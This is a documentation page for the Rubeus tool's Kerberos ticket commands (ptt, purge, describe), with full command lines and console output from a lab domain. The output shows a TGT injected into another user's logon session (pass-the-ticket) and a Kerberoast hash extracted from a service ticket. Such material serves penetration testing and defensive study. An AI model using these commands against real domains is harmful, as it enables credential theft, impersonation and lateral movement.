Breakdown of the ticket management commands:
ptt
The ptt action will submit a /ticket:X
(TGT or service ticket) for the current logon session through the LsaCallAuthenticationPackage() API with a KERB_SUBMIT_TKT_REQUEST message, or (if elevated ) to the logon session specified by /luid:0xA..
. Like other /ticket:X
parameters, the value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk.
Copy C:\Rubeus>Rubeus.exe ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Import Ticket
[+] Ticket successfully imported!
C:\Rubeus>Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (Current User)
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM
Server Name : krbtgt/testlab.local @ TESTLAB.LOCAL
Client Name : dfm.a @ TESTLAB.LOCAL
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
Elevated ticket application to another logon session:
Copy C:\Rubeus>Rubeus.exe klist /luid:0x474722b
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (All Users)
[*] Target LUID : 0x474722b
UserName : patsy
Domain : TESTLAB
LogonId : 0x474722b
UserSID : S-1-5-21-883232822-274137685-4173207997-1169
AuthenticationPackage : Kerberos
LogonType : Interactive
LogonTime : 2/11/2019 10:58:53 PM
LogonServer : PRIMARY
LogonServerDNSDomain : TESTLAB.LOCAL
UserPrincipalName : patsy@testlab.local
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/11/2019 2:58:53 PM ; 2/11/2019 7:58:53 PM ; 2/18/2019 2:58:53 PM
Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
Client Name : patsy @ TESTLAB.LOCAL
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
C:\Rubeus>Rubeus.exe ptt /luid:0x474722b /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Import Ticket
[*] Target LUID: 0x474722b
[+] Ticket successfully imported!
C:\Rubeus>Rubeus.exe klist /luid:0x474722b
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (All Users)
[*] Target LUID : 0x474722b
UserName : patsy
Domain : TESTLAB
LogonId : 0x474722b
UserSID : S-1-5-21-883232822-274137685-4173207997-1169
AuthenticationPackage : Kerberos
LogonType : Interactive
LogonTime : 2/11/2019 10:58:53 PM
LogonServer : PRIMARY
LogonServerDNSDomain : TESTLAB.LOCAL
UserPrincipalName : patsy@testlab.local
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM
Server Name : krbtgt/testlab.local @ TESTLAB.LOCAL
Client Name : dfm.a @ TESTLAB.LOCAL
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
purge
The purge action will purge all Kerberos tickets from the current logon session, or (if elevated) to the logon session specified by /luid:0xA..
.
Copy C:\Rubeus>Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (Current User)
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM
Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
Client Name : harmj0y @ TESTLAB.LOCAL
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
[1] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM
Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
Client Name : harmj0y @ TESTLAB.LOCAL
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
[2] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM
Server Name : cifs/primary.testlab.local @ TESTLAB.LOCAL
Client Name : harmj0y @ TESTLAB.LOCAL
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
C:\Rubeus>Rubeus.exe purge
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
Luid: 0x0
[*] Action: Purge Tickets
[+] Tickets successfully purged!
C:\Rubeus>Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (Current User)
C:\Rubeus>
Elevated purging of another logon session:
Copy C:\Rubeus>Rubeus.exe triage /luid:0x474722b
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Triage Kerberos Tickets
[*] Target LUID : 0x474722b
-----------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------
| 0x474722b | dfm.a @ TESTLAB.LOCAL | krbtgt/testlab.local | 2/11/2019 7:55:18 PM |
-----------------------------------------------------------------------------------
C:\Rubeus>Rubeus.exe purge /luid:0x474722b
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
Luid: 0x474722b
[*] Action: Purge Tickets
[*] Target LUID: 0x474722b
[+] Tickets successfully purged!
C:\Rubeus>Rubeus.exe triage /luid:0x474722b
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Triage Kerberos Tickets
[*] Target LUID : 0x474722b
---------------------------------------
| LUID | UserName | Service | EndTime |
---------------------------------------
---------------------------------------
describe
The describe action takes a /ticket:X
value (TGT or service ticket), parses it, and describes the values of the ticket. Like other /ticket:X
parameters, the value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk.
If the supplied ticket is a service ticket AND the encryption type is RC4_HMAC, an extracted Kerberoast-compatible hash is output. If the ticket is a service ticket but the encryption key is AES128/AES256, a warning is displayed. If the ticket is a TGT, no hash or warning is displayed.
Display information about a TGT:
Copy C:\Rubeus>Rubeus.exe describe /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Describe Ticket
UserName : dfm.a
UserRealm : TESTLAB.LOCAL
ServiceName : krbtgt/testlab.local
ServiceRealm : TESTLAB.LOCAL
StartTime : 2/11/2019 2:55:18 PM
EndTime : 2/11/2019 7:55:18 PM
RenewTill : 2/18/2019 2:55:18 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : e3MxrlTu9jHh9hG43UfiAQ==
Display information about service ticket with an extracted Kerberoast hash:
Copy C:\Rubeus>Rubeus.exe describe /ticket:service_ticket.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.4.1
[*] Action: Describe Ticket
UserName : harmj0y
UserRealm : TESTLAB.LOCAL
ServiceName : asdf/asdfasdf
ServiceRealm : TESTLAB.LOCAL
StartTime : 2/20/2019 8:58:14 AM
EndTime : 2/20/2019 12:41:09 PM
RenewTill : 2/27/2019 7:41:09 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
KeyType : rc4_hmac
Base64(key) : WqGWK4htp7rM1CURpxjMPA==
Kerberoast Hash : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$DEB467BF9C9023E...(snip)...